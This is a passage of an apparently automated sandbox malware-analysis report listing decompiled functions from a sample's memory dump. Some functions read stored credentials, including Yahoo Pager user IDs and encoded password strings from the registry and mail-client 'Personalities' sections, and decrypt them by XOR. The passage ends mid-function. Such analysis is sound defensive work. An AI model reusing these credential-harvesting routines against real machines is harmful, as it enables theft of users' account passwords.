                                                                                              0x0040ff2b
                                                                                              0x0040ff2c
                                                                                              0x0040ff31
                                                                                              0x0040ff32
                                                                                              0x0040ff3a
                                                                                              0x0040ff3c
                                                                                              0x0040ff41
                                                                                              0x0040ff42
                                                                                              0x0040ff47
                                                                                              0x0040ff48
                                                                                              0x0040ff50
                                                                                              0x0040ff52
                                                                                              0x0040ff57
                                                                                              0x0040ff58
                                                                                              0x0040ff5d
                                                                                              0x0040ff5e
                                                                                              0x0040ff66
                                                                                              0x0040ff68
                                                                                              0x0040ff6d
                                                                                              0x0040ff6e
                                                                                              0x0040ff73
                                                                                              0x0040ff75

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                              • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                              • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                              • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040173B, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 44%
                                                                                              			E0040173B(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                              0x0040174a
                                                                                              0x00401761
                                                                                              0x0040176b
                                                                                              0x00401773
                                                                                              0x00401774
                                                                                              0x00401778
                                                                                              0x0040177d
                                                                                              0x0040178d
                                                                                              0x004017a3

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                              • String ID:
                                                                                              • API String ID: 19018683-0
                                                                                              • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                              • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                              • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                              • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411366, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00410E8A(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BC49( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BC6D(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BD0B(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BC49( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BC6D(_t27, _t127,  &_v1172);
						E0040BD0B(_t121, _t127,  &_v24);
						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053D6(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                                                              0x00411366
                                                                                              0x00411372
                                                                                              0x00411381
                                                                                              0x00411387
                                                                                              0x0041139a
                                                                                              0x004113a0
                                                                                              0x004113ae
                                                                                              0x004113b4
                                                                                              0x004113cd
                                                                                              0x004113da
                                                                                              0x004113dc
                                                                                              0x004113e2
                                                                                              0x004113e4
                                                                                              0x004113f5
                                                                                              0x0041140b
                                                                                              0x00411413
                                                                                              0x0041141f
                                                                                              0x00411425
                                                                                              0x00411431
                                                                                              0x00411434
                                                                                              0x00411439
                                                                                              0x0041144b
                                                                                              0x00411452
                                                                                              0x0041145e
                                                                                              0x00411463
                                                                                              0x0041146c
                                                                                              0x00411488
                                                                                              0x0041148d
                                                                                              0x0041149a
                                                                                              0x0041149f
                                                                                              0x004114a5
                                                                                              0x004114aa
                                                                                              0x004114ac
                                                                                              0x004114af
                                                                                              0x004114ba
                                                                                              0x004114ba
                                                                                              0x004114bd
                                                                                              0x004114c5
                                                                                              0x004114c8
                                                                                              0x004114cb
                                                                                              0x004114ce
                                                                                              0x004114d8
                                                                                              0x004114dd
                                                                                              0x004114e1
                                                                                              0x004114e4
                                                                                              0x004114e4
                                                                                              0x004114e7
                                                                                              0x004114e7
                                                                                              0x004114ea
                                                                                              0x004114ea
                                                                                              0x004114ed
                                                                                              0x004114f4
                                                                                              0x004114f9
                                                                                              0x004114fb
                                                                                              0x004114fb
                                                                                              0x004114fb
                                                                                              0x00411500
                                                                                              0x00411502
                                                                                              0x0041150b
                                                                                              0x0041150d
                                                                                              0x0041150f
                                                                                              0x00411512
                                                                                              0x00411514
                                                                                              0x00411515
                                                                                              0x00411515
                                                                                              0x0041150f
                                                                                              0x0041151b
                                                                                              0x00411524
                                                                                              0x00411526
                                                                                              0x00411526
                                                                                              0x004113e4
                                                                                              0x0041152e

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00411387
                                                                                              • memset.MSVCRT ref: 004113A0
                                                                                              • memset.MSVCRT ref: 004113B4
                                                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                              • strlen.MSVCRT ref: 004113D0
                                                                                              • memcpy.MSVCRT ref: 004113F5
                                                                                              • memcpy.MSVCRT ref: 0041140B
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                              • memcpy.MSVCRT ref: 0041144B
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 2142929671-0
                                                                                              • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                              • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                              • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                              • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 36%
                                                                                              			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                                              0x004078ff
                                                                                              0x00407906
                                                                                              0x00407908
                                                                                              0x00407908
                                                                                              0x0040790d
                                                                                              0x00407914
                                                                                              0x00407919
                                                                                              0x0040792b
                                                                                              0x0040792b
                                                                                              0x0040791b
                                                                                              0x0040791b
                                                                                              0x00407926
                                                                                              0x00407929
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407929
                                                                                              0x0040795f
                                                                                              0x0040795f
                                                                                              0x0040792d
                                                                                              0x0040792f
                                                                                              0x00407a50
                                                                                              0x00407a50
                                                                                              0x00407935
                                                                                              0x0040793b
                                                                                              0x0040796e
                                                                                              0x004079ba
                                                                                              0x004079bb
                                                                                              0x004079c1
                                                                                              0x004079c7
                                                                                              0x00000000
                                                                                              0x00407970
                                                                                              0x0040797a
                                                                                              0x00407986
                                                                                              0x0040798b
                                                                                              0x00407990
                                                                                              0x004079a4
                                                                                              0x004079aa
                                                                                              0x004079ab
                                                                                              0x004079b1
                                                                                              0x00000000
                                                                                              0x00407992
                                                                                              0x0040799d
                                                                                              0x004079a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079a2
                                                                                              0x00407990
                                                                                              0x0040793d
                                                                                              0x00407943
                                                                                              0x00407944
                                                                                              0x0040794d
                                                                                              0x0040794e
                                                                                              0x0040794e
                                                                                              0x004079c8
                                                                                              0x004079ce
                                                                                              0x004079d0
                                                                                              0x004079d0
                                                                                              0x004079d2
                                                                                              0x00407a49
                                                                                              0x00407a49
                                                                                              0x004079d4
                                                                                              0x004079d4
                                                                                              0x004079e3
                                                                                              0x00000000
                                                                                              0x004079f3
                                                                                              0x004079f9
                                                                                              0x004079fc
                                                                                              0x00407a07
                                                                                              0x00407a1d
                                                                                              0x00407a2b
                                                                                              0x00407a36
                                                                                              0x00407a42
                                                                                              0x00407a47
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a47
                                                                                              0x004079e3
                                                                                              0x004079d2
                                                                                              0x00407a54

                                                                                              APIs
                                                                                              • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                              • strlen.MSVCRT ref: 00407998
                                                                                              • LoadStringA.USER32 ref: 004079C8
                                                                                              • memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                              • String ID: strings
                                                                                              • API String ID: 1748916193-3030018805
                                                                                              • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                              • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                              • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                              • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                                              0x0040329e
                                                                                              0x004032ac
                                                                                              0x004032b6
                                                                                              0x004032bd
                                                                                              0x004032c3
                                                                                              0x004032d3
                                                                                              0x004032da
                                                                                              0x004032da
                                                                                              0x004032ec
                                                                                              0x004032f2
                                                                                              0x0040330c
                                                                                              0x00403314
                                                                                              0x00403390
                                                                                              0x00000000
                                                                                              0x00403316
                                                                                              0x00403316
                                                                                              0x00403319
                                                                                              0x0040331c
                                                                                              0x0040331f
                                                                                              0x00403322
                                                                                              0x00403324
                                                                                              0x00403382
                                                                                              0x00403383
                                                                                              0x0040338a
                                                                                              0x0040338e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040332c
                                                                                              0x00403332
                                                                                              0x0040334a
                                                                                              0x00403367
                                                                                              0x00403367
                                                                                              0x0040336c
                                                                                              0x0040336f
                                                                                              0x00403379
                                                                                              0x00000000
                                                                                              0x0040337b
                                                                                              0x0040337b
                                                                                              0x00000000
                                                                                              0x0040337b
                                                                                              0x00403379
                                                                                              0x00000000
                                                                                              0x00403382
                                                                                              0x00403314
                                                                                              0x00403394

                                                                                              APIs
                                                                                                • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                              • memset.MSVCRT ref: 004032F2
                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                                                              • strchr.MSVCRT ref: 00403341
                                                                                                • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                              • strlen.MSVCRT ref: 00403383
                                                                                                • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                              • String ID: Personalities
                                                                                              • API String ID: 2103853322-4287407858
                                                                                              • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                              • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                              • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                              • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410F79, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                                                              0x00410f79
                                                                                              0x00410f8a
                                                                                              0x00410f94
                                                                                              0x00410f9b
                                                                                              0x00410fb8
                                                                                              0x00410fd1
                                                                                              0x00411002
                                                                                              0x00411002
                                                                                              0x00411007
                                                                                              0x00411007
                                                                                              0x00411012

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00410F9B
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                              • API String ID: 1830152886-1703613266
                                                                                              • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                              • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                              • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                              • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F41, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405F41(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E46(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                                                              0x00405f4b
                                                                                              0x00405f4f
                                                                                              0x00405f57
                                                                                              0x00405f57
                                                                                              0x00405f60
                                                                                              0x00405f79
                                                                                              0x00405f9a

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessagesprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 1670431679-1552265934
                                                                                              • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                              • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                              • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                              • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                              0x0040f03e
                                                                                              0x0040f046
                                                                                              0x0040f04e
                                                                                              0x0040f056
                                                                                              0x0040f063
                                                                                              0x0040f063
                                                                                              0x0040f066
                                                                                              0x0040f070

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,74EB48C0,00405C41,00000000), ref: 0040F040
                                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                              • API String ID: 145871493-1506664499
                                                                                              • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                              • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                              • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                              • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
